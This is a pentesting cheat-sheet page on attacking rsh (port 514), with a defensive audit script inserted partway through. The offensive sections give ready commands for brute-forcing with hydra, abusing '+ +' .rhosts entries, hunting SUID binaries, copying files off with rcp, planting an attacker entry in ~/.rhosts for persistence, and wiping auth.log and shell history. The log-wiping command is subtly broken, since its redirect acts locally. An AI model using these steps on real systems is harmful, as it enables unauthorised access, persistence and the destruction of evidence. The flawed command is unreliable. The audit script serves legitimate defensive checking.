Rsh - Port 514
Basic Info
Rsh authenticated clients using .rhosts files together with /etc/hosts.equiv. Trust was granted on the basis of the client's IP address and its DNS name, so the ease of spoofing IP addresses, notably on the local network, was a significant vulnerability.
Moreover, the .rhosts files usually lived in users' home directories, which were often mounted from Network File System (NFS) volumes.
Default port: 514
Login
rsh <IP> <Command>
rsh <IP> -l domain\user <Command>
rsh domain/user@<IP> <Command>
rsh domain\\user@<IP> <Command>
Attack Vectors
Exploiting Weak Authentication
Check for weak authentication mechanisms. RSH often relies on the .rhosts file for authentication, which can be easily exploited if not properly configured.
Brute Force Attacks
You can perform brute-force attacks to guess weak passwords using tools like hydra:
hydra -l <username> -P /path/to/passwords.txt <target_ip> rsh
This command attempts to brute-force the specified RSH server.
Exploiting Misconfigurations
Look for misconfigured .rhosts files that allow unauthorized access. For example, a .rhosts file with the following entry can be exploited:
+ +
This entry allows any user from any host to log in without a password.
Post-Exploitation
Privilege Escalation
After gaining access, attempt to escalate privileges to a higher-level account. One common method is to search for SUID binaries:
rsh <remote-server-ip> -l <username> find / -perm -4000 -type f 2>/dev/null
This command lists all SUID binaries, which could potentially be exploited for privilege escalation.
Data Exfiltration
Once you have access, you can exfiltrate data from the remote machine. For example, you can copy files using the rcp (remote copy) command:
rcp <remote-server-ip>:<remote-file-path> <local-file-path>
Persistent Access
To maintain persistent access, you can add your SSH key to the ~/.ssh/authorized_keys file or modify the .rhosts file to allow your host:
echo "attacker-ip attacker-user" >> ~/.rhosts
This entry grants login permissions to the specified user on the attacker's IP address.
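Both the "+ +" entry under Exploiting Misconfigurations and the appended ~/.rhosts line under Persistent Access are plain text that a host owner can find by scanning the rsh trust files. The following POSIX sh audit script is an added example, not code from the original page: it parses /etc/hosts.equiv and every ~/.rhosts listed in /etc/passwd, flags entries whose host or user field is the "+" wildcard (a "+@netgroup" is a netgroup reference, not a wildcard, and "-host" is a deny entry, so neither is flagged), and exits non-zero when anything is found. The AUDIT_ROOT prefix lets it run against a mounted disk image; the file paths and the RSH_AUDIT variable are this example's own conventions.

```shell
#!/bin/sh
# Added defensive example (not from the original page): audit the rsh trust
# files for entries that grant access without a password.

# Parse one rsh trust file (hosts.equiv or .rhosts). Each entry is
# "host [user]"; a bare "+" in either field trusts every host / every user.
# Prints "file:line:reason" per risky field; returns 1 if any were found.
audit_rhosts_file() {
    file=$1
    found=0
    n=0
    [ -r "$file" ] || return 0
    while IFS= read -r line || [ -n "$line" ]; do
        n=$((n + 1))
        entry=${line%%#*}          # drop trailing comments (constructed convention)
        set -f                     # no pathname expansion while word-splitting
        set -- $entry
        set +f
        [ $# -eq 0 ] && continue   # blank or comment-only line
        host=$1
        user=${2:-}
        case "$host" in
            +) printf '%s:%d:any host trusted (host field is "+")\n' "$file" "$n"; found=1 ;;
        esac
        case "$user" in
            +) printf '%s:%d:any user trusted (user field is "+")\n' "$file" "$n"; found=1 ;;
        esac
    done < "$file"
    return $found
}

# Walk the system-wide file and every home directory from passwd.
# $1 is an optional root prefix (e.g. a mounted image); returns 1 if any
# file contained a wildcard entry.
audit_rsh_trust() {
    root=${1:-}
    total=0
    audit_rhosts_file "$root/etc/hosts.equiv" || total=$((total + 1))
    # passwd fields: name:pw:uid:gid:gecos:home:shell
    while IFS=: read -r _ _ _ _ _ home _; do
        [ -n "$home" ] || continue
        audit_rhosts_file "$root$home/.rhosts" || total=$((total + 1))
    done < "$root/etc/passwd"
    [ "$total" -eq 0 ]
}

# Usage: RSH_AUDIT=1 sh rsh_audit.sh                     (live system)
#        RSH_AUDIT=1 AUDIT_ROOT=/mnt/image sh rsh_audit.sh (mounted image)
if [ -n "${RSH_AUDIT:-}" ]; then
    audit_rsh_trust "${AUDIT_ROOT:-}" && echo "no wildcard rsh trust entries found"
fi
```

Run it from a scheduled job or a configuration-compliance check; a non-zero exit plus the file:line output is enough to alert on, and the same scan catches a freshly appended .rhosts line because it reports every wildcard field, not only "+ +".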
Covering Tracks
It's crucial to cover your tracks to avoid detection. You can delete log entries related to your activities:
rsh <remote-server-ip> -l <username> echo "" > /var/log/auth.log
rsh <remote-server-ip> -l <username> history -c
These commands clear the authentication log and command history.